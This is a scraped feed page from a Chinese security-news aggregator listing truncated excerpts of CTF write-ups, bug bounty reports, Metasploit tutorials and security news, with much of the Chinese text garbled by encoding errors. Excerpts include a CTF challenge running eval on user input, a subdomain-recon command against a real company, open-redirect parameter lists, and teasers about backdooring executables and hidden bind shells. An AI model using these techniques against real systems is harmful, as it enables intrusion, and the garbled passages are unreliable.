Happy Hacking8

干净的信息流推送工具,偏向安全圈的点点滴滴,为安全研究人员每日发现优质内容。

每日更新
时间节点
2021-07-31 18:40:14Zedd's Blog
最近总结整�了 TLS Poison 攻击相关的知识,本文会继续讲 TLS Poison 利用,以�其在 CTF 的�际�用,也通过这个题目��� FTPS 相关知识。
文章首��长亭安全课堂:TLS-Poison 攻击方�在真�CTF赛题中的利用�践 https://mp.weixin.qq.com/s/ZziSf69AOyXoI0IgC0UyUQ
PS: 在阅读本文之�,建议您��相关的 TLS Poison 先验知识,本文�会��新详细介� TLS Poison 攻击的基础知识
我们首先���顾 Black Hat 这个议题,为什么作者使用的是 When TLS Hacks You 呢?而�是 When HTTPS Hack You ,说�这个问题是出�在 TLS 特性身上,所以目�我们貌似都更多�局�地专注在 HTTPS 上,这是比较狭隘的考虑。既然如此,HTTPS 是 HTTP over TLS ,那其他�议是�是也�以呢?比如 FTPS ,FTP over TLS 等等?那我们�看看 FTPS �以如何使用。
Introduction of FTPS
​ FTPS (also known FTP-SSL, and FTP Secure) is an extension to the commonly use
2021-07-31 18:40:14Zedd's Blog
这是《一篇文章带你读懂 XXX 攻击》系列的第二篇文章,本篇文章主�讲述 TLS Poison 攻击对应的三�攻击方��一些�能算是“新�的 DNS Rebinding 技巧以�一些关� IP 选择�索等内容。
文章首��雷�众测,分为系列文章:
一篇文章带你读懂 TLS Poison 攻击(一)https://mp.weixin.qq.com/s/tAba3-qb5YGtlzH7y6PFvg
一篇文章带你读懂 TLS Poison 攻击(二)https://mp.weixin.qq.com/s/aIWcpIXs-jQoMXuEppj3TQ
一篇文章带你读懂 TLS Poison 攻击(三)https://mp.weixin.qq.com/s/vBAeGaeBKnSyXUL_qmr7Gg
一篇文章带你读懂 TLS Poison 攻击(四)https://mp.weixin.qq.com/s/YdV9Hlpz38d09JOdtf2PxA
[TOC]
Preface
使用《一篇文章带你读懂 XXX 攻击》的标题是为了ç�£ä¿ƒè‡ªå·±æŠŠä¸€ä¸ªæ”»å‡»çš„å°½å�¯èƒ½å¤šçš„细节尽å�¯èƒ½çš„æ��懂,也是为了æ��å�‡è‡ªå·±çš„写作以å�Šè¡¨è¿°æ°´å¹³ã€‚本文旨在帮助大家了解学习 TLS Poison 攻击,希望通过一篇文章让大家读懂 TLS Poison 攻击,ä½
2021-07-31 18:40:14Zedd's Blog
�离 DEFCON 28 Final 已�过�了两个多月了,本�结�就写写,但是因为一些��事耽�了,�在补一下这次�赛的一些��。
[TOC]
Preface
�言:本篇文章�代表任何组织社团的观点,全文仅代表个人看法以���。如有冒犯请�系我进行必�的修改。
由�今年疫情的�因,今年的 DEFCON Final 在线上举�,我有幸� Tea Deliverers 一起��了 DEFCON 28 CTF Final ,最终在比赛中�得了第四的�绩。本文我会主���赛���闻以�一些对� Web 题的分�入手�写这篇文章,由� Web 题过分简�,也没什么特别好分�的,所以没什么技术�养,�以�当�说看看,��一笑。并且为了��一些�必�的麻烦,全文涉�到姓� ID 处我都尽�以�师傅进行称呼。
The First DEFCON Final In My Life
Simple Introduction
今年的赛制我这里简�介�一下,想详细了解的�以�考一下官网:https://oooverflow.io
2021-07-31 18:40:14Zedd's Blog
�几天 PortSwigger �布了 Top 10 web hacking techniques of 2019,榜上的攻击技术都比较有��,p牛也肯定会在�密圈�分享的(如�没有�本�也会在自己�客��学习分享),所以我们这里就�� Top 10 技术了,就看看在 Top 10 ��结�没上榜但是�旧很有��的技术 Dom Clobbering。
文章首��先知社区:https://xz.aliyun.com/t/7329
Basics
From MDN Web Docs:
​ The Document Object Model (DOM) is a programming interface for HTML and XML documents. It represents the page so that programs can change the document structure, style, and content. The DOM represents the document as nodes and objects. That way, programming languages can connect to the page.
A Web page is a document. This document can be either displayed in the browser window or as the HTML source. But it is the same document in both cases. The Document Object Model (DOM) represents that same document so it can be manipulated. The DOM is an object-oriented represent
2021-07-31 18:40:14Zedd's Blog
签到选手�请自�,�过了好几天的�磨,终�把这次比赛的题目都弄得差�多了,这里记录一下本次比赛 Web 题目的解法。
文章首��先知社区:https://xz.aliyun.com/t/7081
如�师傅们有更好更有��的解法,欢�多多��鸡交�。�常感谢 @rebirth @wonderkun @wupco 等师傅在我学习本次比赛赛题时候��其烦地指导我。
File Magician
Difficulty estimate: easy
Solved:133/321
Points: round(1000 · min(1, 10 / (9 + [133 solves]))) = 70 points
Description:
Finally (again), a minimalistic, open-source file hosting solution.
Download:
file magician-3ace41f3b0282a70.tar.xz (2.1 KiB)
算是 Web 当中的一个签到题,直�给出 Docker 文件�代�,我们�以在本地�起�试试。
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48

<?php
error_reporting(0);
ini_set('display_errors', 0);
ini_set('display_startup_errors', 0);
se
2021-07-31 18:40:14Zedd's Blog
今年的 Defcon 27 � Black Hat 上都有�到 HTTP DESYNC ATTACKS ,�几个月就想抽时间�研究研究了,奈何一直没什么时间,最近抽时间专门看了一下。
文章首��先知社区:https://xz.aliyun.com/t/6878
在�些天研究的时候,�巧 mengchen@知�创宇404�验室 也�表了�议层的攻击——HTTP请求走�文章,也带给了自己更多的�示,师傅的文章写的�常的�错,墙裂建议阅读,这里我结�师傅的文章跟自己的一些�解进行一些整�,本文亦��解为那篇文章的补充�更详细的�述。
整篇文章由�自己时间问题,����拖了两个月左�,中间时间间隔�能比较久,所以文章会有比较多的��,还请师傅们看�直�指出斧正。写作�易,还请师傅们多多担待。最近也一直在关注这方�的安全问题,欢�一起学习讨论: ) �系方�:emVkZHl1Lmx1QGdtYWlsLmNvbQ==
å��续如æ�œæœ‰æ–°çš„总结å�‘ç�°ä¹Ÿä¼šå�‘自å·
2021-07-31 18:40:14Zedd's Blog
在今年的 WCTF 2019 上,Tokyo Westerns 出了一�� Windows Defender 侧信�攻击相关的题目,在 Tokyo Westerns CTF 2019 上也有一��之有关的题目 PHP Note,看了感觉比较有趣,但是我看的网络文章写的都比较粗略,这里我就记录一下自己的分�。
Windows Defender
众所周知,Windows Defender 是 Windows 10 平�上一款自带的安全防护软件,
游�弹窗�手
Windows Defender(Windows 10 创�者更新��为Windows Defender Antivirus),曾用�Microsoft AntiSpyware,最�是用�移除�隔离和预防间�软件的程�,�以�行在Windows XP以�更高版本的�作系统上,并已�内置在Windows Vista以�以�的版本中。Windows Defender的定义库更新很频�。在Windows 8�之�的系统中�代Microsoft Security Essentials,�为一款全��病毒软件。
Windows Defender���些其他�类�费产�一样�能扫�系统,还�以对系统进行�时监�,移除已�
2021-07-31 18:40:14Zedd's Blog
这次我给 SUCTF 出了三� Web,分别是 CheckIn � pythonginx � Upload Labs 2,下��一下出题时候的一些�路以��想,还有最近对� phar 的一些深入挖�。
文章首��先知社区:https://xz.aliyun.com/t/6057
CheckIn
关� CheckIn 这�题,是我在看 php 文档时候翻到的一个关� .user.ini 的说�,然��考了 user.ini文件��的PHP�门,因为是比较久远的东西了,而且我看很多什么上传教程,甚至我认为总结比较全�的 upload labs 都未曾��到这个 trick ,而且�忆了一下以�粗略�了一下,都没有��有过 CTF 出过这个 trick ,但是�比较简�,我猜肯定还有些人并�知�这个 trick ,所以就放在了 web1 作为签到的题目。
出题的时候直�拿了国赛�东北赛区一个题目���改的,�本是想直� ban �htaccess的,节�大家的时间,��让大家的�路跑�。结�打错了�了htacess…然�就有一群师傅
2021-07-31 18:40:14Zedd's Blog
文章首��先知社区:https://xz.aliyun.com/t/5677
在 ISITDTU CTF 2019 上�了一�比较有��的代�审计题,主�应用了 php 异或等�作进行 getshell,收�还是挺多的。最近越�越喜欢看这�代�简�,但是�蕴��机的东西了…
Description
​ Don’t try to run any Linux command, just use all the PHP functions you know to get the flag
1
2
3
4
5
6
7
8
9
10
11
12

<?php
highlight_file(__FILE__);

$_ = @$_GET['_'];
if ( preg_match('/[\x00- 0-9\'"`$&.,|[{_defgops\x7F]+/i', $_) )
die('rosé will not do it');

if ( strlen(count_chars(strtolower($_), 0x3)) > 0xd )
die('you are so close, omg');

eval($_);
?>

Write Up
Explation
题目代�比较简�,首先看看第一个正则:
�看看第二个过滤,strtolower将字符串转�为�写,用count_chars返�由所有使用了的字节值组�的字符串,�判断其中�个字符累计出�次数是�大� 13
Doing
Step 1
既然正则约�了比较多的�件,自然我们首先得
2021-07-31 18:40:12wonderkun's|blog
Please enter the password to read the blog.
Incorrect Password!
No content to display!
U2FsdGVkX19NCsxaYkzdR/PKvJ1hyTrG5ZUvNU93FXs=
2021-07-31 18:39:57Hackerman's Hacking Tutorials
A few days ago I saw a tweet about thick client vulnerability. I am not linking to it because it appeared to be someone new to the industry and very excited.
The Original Tweet
Well, most of these are not vulnerabilities. So, I am compiling my tweets into a blog post.
It's important that we only go after actual vulnerabilities and not spread misinformation.
Funnily, I have talked about several of these in a separate blog post named No, You Are Not Getting a CVE for That
2021-07-31 18:39:49Sploitus.com Exploits RSS Feed
2021-07-31 18:39:49Sploitus.com Exploits RSS Feed
2021-07-31 18:39:49Security Boulevard
Did you know that according to recent research by a famous Japanese Security Firm, it has been discovered that the computer systems in Japan are being attacked by destructive wiper malware? As a matter of shock, this was discovered 2 days before the opening ceremony of the Tokyo Olympics 2021.  What is wiper malware? Wiper […]
The post Wiper Malware Threat Looms Over Tokyo Olympics appeared first on Kratikal Blogs.
The post Wiper Malware Threat Looms Over Tokyo Olympics appeared first on Security Boulevard.
2021-07-31 18:39:49Security Boulevard
The appeal of cloud services makes it all the more important for these providers to understand how GDPR obligations affect their business.
The post GDPR: What Cloud Service Providers Should Know appeared first on Security Boulevard.
2021-07-31 18:39:29bunnie's blog
The Ware for July 2021 is shown below. For well over a year now, I haven’t traveled much further than 10km from where I sit and write this. However, sometimes the world brings you interesting things. This ware has a little bit of a story behind it; it arrived, and of course I popped off […]
2021-07-31 18:39:29bunnie's blog
The Ware for June 2021 is an Amplifier Research AR200L 200W linear power amp. This is the last (for now at least) of the very fine set of wares that Don Straney had contributed. Thanks, Don! They helped get me through the pandemic, until I can travel the world again and stumble across new wares. […]
2021-07-31 18:26:46hackone最新公开漏洞
影响厂商:Rocket.Chat 奖励: 危险等级:high
Users.list API 中的 Post-Auth 盲 NoSQL 注入导致远程代码执行
2021-07-31 17:07:26T00ls论坛
2021-07-31 17:07:26T00ls论坛
2021-07-31 16:47:25T00ls论坛
2021-07-31 16:27:32看雪论坛
本周,福昕发布了PDF阅读器和编辑器的安全更新,以解决包括远程代码执行在内的多个漏洞。
2021-07-31 16:26:21知名组件CVE监控
有新的漏洞组件被发现啦,组件ID:深信服
2021-07-31 16:26:20知名组件CVE监控
有新的漏洞组件被发现啦,组件ID:海康威视
2021-07-31 16:26:20知名组件CVE监控
2021-07-31 16:26:20知名组件CVE监控
有新的漏洞组件被发现啦,组件ID:海康威视
2021-07-31 16:07:27T00ls论坛
2021-07-31 15:07:58来自Freebuf
关于AggrokatzAggrokatz是一款CobaltStrike攻击扩展插件,它能够启用pypykatz实现针对Beacon的远程...
2021-07-31 13:07:36来自Freebuf
本文将从Chromium架构及安全机制概况入手,剖析Chromium组件在多场景下给企业带来的安全风险并一探收敛方案。
2021-07-31 13:07:17T00ls论坛
2021-07-31 12:07:44来自Freebuf
北京从云科技有限公司(简称:从云科技)成立于2018年10月,是一家以零信任为基础的数据安全产品解决方案提供商。
2021-07-31 10:47:38来自Freebuf
Argo面向Web的仪表板的错误配置权限允许未经身份验证的攻击者在Kubernetes目标上运行代码,包括加密采矿容器。
2021-07-31 10:26:37hackone最新公开漏洞
影响厂商:Snapchat 奖励:1000.0USD 危险等级:medium
Bitmoji 源代码是可访问的
2021-07-31 10:07:33来自Freebuf
本文为安卓学习第二篇。
2021-07-31 10:07:28360安全客
...
实战中遇到过这样一个案例,一个输入密码正确后会302跳转到后台页面的登录口存在盲注,但登录数据有加密,无法试用sqlmap完成自动注入的过程,于是想编写python脚本自动化完成这个过程。
2021-07-31 08:44:10Software Integrity Blog
In this episode of AppSec Decoded, we discuss the impact of the new executive order by the Biden administration on organizations working with the government.
The post AppSec Decoded: New executive order changes dynamic of software security standards appeared first on Software Integrity Blog.
2021-07-31 08:44:10Software Integrity Blog
Addressing security fatigue with small changes to your AppSec strategy can help you manage and minimize risks in your applications.
The post How to cyber security: Addressing security fatigue appeared first on Software Integrity Blog.
2021-07-31 08:44:06HackerOne Hacker Activity
Date: 2021-07-30 20:07 UTC
OS: FreeBSD 12.2-RELEASE-p5
PHP Version: 7.3.29
Package: Scripting Engine problem
Title: Segmentation fault
2021-07-31 08:44:06HackerOne Hacker Activity
Date: 2021-07-30 18:00 UTC
OS: Windows 10 21H1
PHP Version: 8.0.9
Package: GD related
Title: imagefilledellipse - draws strange shape in large size
2021-07-31 08:44:06HackerOne Hacker Activity
Date: 2021-07-30 03:18 UTC
OS: ubuntu
PHP Version: 7.4.22
Package: mbstring related
Title: mb_convert_variables() corrupts reference of array element
2021-07-31 08:44:06HackerOne Hacker Activity
Date: 2021-07-29 19:30 UTC
OS: Windows + Linux
PHP Version: 8.0.9
Package: JIT
Title: Segfault running test suite with JIT enabled
2021-07-31 08:44:06HackerOne Hacker Activity
Date: 2021-07-29 17:13 UTC
OS: Ubuntu-latest
PHP Version: Irrelevant
Package: solr
Title: Unable to compile because of curl directory structure
2021-07-31 08:44:02Bug Bounty in InfoSec Write-up
A write-up about a Client-Side DoS on Keep that allowed me to block any user from accessing their keep notes
Continue reading on InfoSec Write-ups »
2021-07-31 08:44:02Bug Bounty in InfoSec Write-up
Hello everyone, today I will be talking about one of the critical bugs which I found in the Oracle Corporation. Now, let’s start with the recon process
Step 1 :
1)There are multiple tools by which you can get subdomains, a few of them are given below…
i) Findomain
ii) Subfinder
iii) knock.py
2) To get the live host from the subdomain list, we can use tools such as
i)httprobe
ii) httpx
Now I prefer to use findomain for getting my results quickly. So the command would look something like this….
Command : findomain -t oracle.com| httpx -title -status-code | tee oracle.txt
Step 2 :
You need to gather some more endpoints to find P1 bugs and for that, you can use Waybackurls and Gau.
Step 3 :
Now, I was looking for admin portals to get unauthenticated access and for that, I searched for some endpoints.
Endpoints :
i)dev.
ii)stag.
iii)admin.
iv)internal.
v)stag-dev.
vi)stag-admin.
vii)internal-dev.
viii)_dev.
There are more endpoints that you can find out by opening the URLs one by one from waybackurls, gau, and the
2021-07-31 08:44:02Bug Bounty in InfoSec Write-up
An estimated $712.4 billion was lost to banking fraud in 2020, with nearly 75 % of it being internal and Identity Theft.
Continue reading on InfoSec Write-ups »
2021-07-31 08:44:02Bug Bounty in InfoSec Write-up
I’m going to solve another room called “Yearofthejellyfish“. It’s available at TryHackMe with Hard difficulty level.
#yearofthejellyfish
#The first thing we want to do is add the deployed machine’s IP and host name to /etc/hosts:
/etc/hosts
Let’s do a port scan:
nmap result
There is a few ports opened.
Let’s start with what looks to be a website on port 443. Going to the website we’re first presented with a warning. We can see there is a self signed certificate in use for this site. Click View Certificate to have a look:
certificate
This reveals the certificate has three additional Subject Alternate Names.
Let’s add them to our hosts file:
/etc/hosts
Continuing on to the site we see a single static page:
Looking at dev.robyns-petshop.thm and beta.robyns-petshop.thm. there is Nothing noteworthy. Now let’s look at the monitorr.robyns-petshop.thm subdomain:
monitorr
according to GitHub link: Monitorr is a web-front to live display the status of any web-app or service.
I notice a version number at the bottom of t
2021-07-31 08:44:02Bug Bounty in InfoSec Write-up
Hello, It’s me Bikram Kharal from Nepal.I am infosec learner and engineering student.
Today I will be writing about the bug that i recently founded on Vulnearbility Discolure Program so in this blog i will be naming it as redacted.com. I was scrolling the twitter while my online class were running and someone was suggesting to hunt on that redacted site. So me to my studies
https://medium.com/media/33600e4b5a6692eec0ea6791e715b011/href
Now i started testing on that site.
As normal I registered on that site and start understanding how the website was working.After registration it was asking me to verify the email using the 6 digit code.So i tried to bruteforce the endpoint but there was rate limiting.
After one hour testing i realized that it was IP based rate limiting then i bypassed that using IP rotate extension in burpsuite.Then quickly reported that bug.lol
After one day i got reply from them that it was Duplicate. :(
I was still searching for other bug on the same program.Again i register at the site wit
2021-07-31 08:44:02Bug Bounty in InfoSec Write-up
Something is better than nothing, even if it is less than one wanted.
Continue reading on InfoSec Write-ups »
2021-07-31 08:44:02Bug Bounty in InfoSec Write-up
A buffer is a space of physical storage memory used to store temporary data while moving from one place to another. These buffers usually reside in RAM. Computers often use buffers to improve performance; most modern hard drives use the benefits of buffering to access data efficiently, and many online application services also use buffers. For example, buffers are often used during online video streaming to prevent interference. When a video is streamed, the video player simultaneously downloads and stores 20% of the video in a buffer and then streams from that buffer. Therefore, a small reduction in connection speed or rapid service interruption does not affect the performance of the video streaming.
However, buffers contain a certain amount of data that limits it to hold limited data for limited time as multiple application uses this mechanism of buffer. Resultantly a situation arrives when further data is pushed into buffer, such condition refer to a term called buffer overflow. It is a flaw that arises wh
2021-07-31 08:44:02Bug Bounty in InfoSec Write-up
A method to escalate your privileges without knowing any password.
Hi guys!
Recently I took a course about windows privilege escalation, and today I want to show you a very cool method that you can use to escalate your privilege without knowing the password of the user account.
Let’s start!
Windows credential manager
First, if you don’t know what windows credential manager is, it’s just a simple password manager pre-installed in windows where you can save your credentials both for user and websites.
So basically you can save your password in 4 different sections.
Windows credentials that are used by windows.
Certificate-Based Credentials as the name say use certificates, however they are pretty rare to use.
Generic credentials.
Web credentials used for saving logins for websites.
Now let’see how we can save our credentials.
Open the search bar and type Credentials manager.
Now let’s try to add a new credential.
We can confirm that the credential has been saved by run the command below.
cmdkey /list
Note: cmdk
2021-07-31 08:44:02Bug Bounty in InfoSec Write-up
Hi There,
Renganathan here.
This write-up is about the vulnerability that I found on Medium which will allow me to hack your medium account by phishing your FB, Twitter & Google credentials.
Medium Login
YES :P
A few months ago I saw Pratik Dabhi was listed in the medium hall of fame. So I was motivated to hunt bugs on Medium. I enumerated the subdomains and stopped there because my methodologies in earlier days were very outdated and I was not good at recon.
So I thought of giving it a try again.
I started with collecting the interesting parameters with Waybackurls, ParamSpider & Gau. simultaneously I was manually exploring the site and also spider the medium with the Burp Suite.
Burp Suite Spidering
Then after some time, I was searching for the Open Redirection parameters like the below ones.
?next=
?url=
?target=
?rurl=
?dest=
?destination=
?redir=
redirect_uri=
?redirect_url=
?redirect=
/redirect/
cgi-bin/redirect.cgi?{}
/out/
/out?
?view=
/login?to=
?image_url=
?go=
?return=
?returnTo=
?return_to=
?check
2021-07-31 08:43:59Hacking Articles
This is in continuation with the Metasploit for Pentester series of articles that we are presenting.  More specifically we learned about the Workspaces and the Metasploit Database service in this article: Metasploit for Pentester: Database & Workspace. In this article, we will be discussing another database inside the Workspace that
The post Metasploit for Pentester: Creds appeared first on Hacking Articles.
2021-07-31 08:43:59Hacking Articles
In this article, we are going to cover the tactics of Hidden BIND TCP shellcode. Every organization has multiple scanning tools to scan their network and to identify the new or unidentified open ports. In this type of environment, it’s very difficult to hide the suspicious bind shellcode and remains
The post Metasploit for Pentester: Windows Hidden Bind Shell appeared first on Hacking Articles.
2021-07-31 08:43:59Hacking Articles
In the continuation in this series of articles dedicated to the Metasploit Framework to provide an appropriate resource for Penetration Testers so that they can use the variety of the features present in the Metasploit Framework to the maximum extent. In this article, we will be talking about the migrate
The post Metasploit for Pentester: Migrate appeared first on Hacking Articles.
2021-07-31 08:43:59Hacking Articles
Socat is one of those kinds of tools that either you might not know at all, or if you know then you might know all the different kinds of stuff that you can do with it. While working with it, we felt that there are guides for socat but none
The post Socat for Pentester appeared first on Hacking Articles.
2021-07-31 08:43:59Hacking Articles
Being lurking and undetectable is the priority after anonymity. In this article, we are going to learn how to create an innocuous-looking backdoor and bind it with a legitimate executable file to gain the victims’ trust. Table of Content Pre-requisites for Lab set up Executable file search on victim’s PC
The post Metasploit for Pentester: Inject Payload into Executable appeared first on Hacking Articles.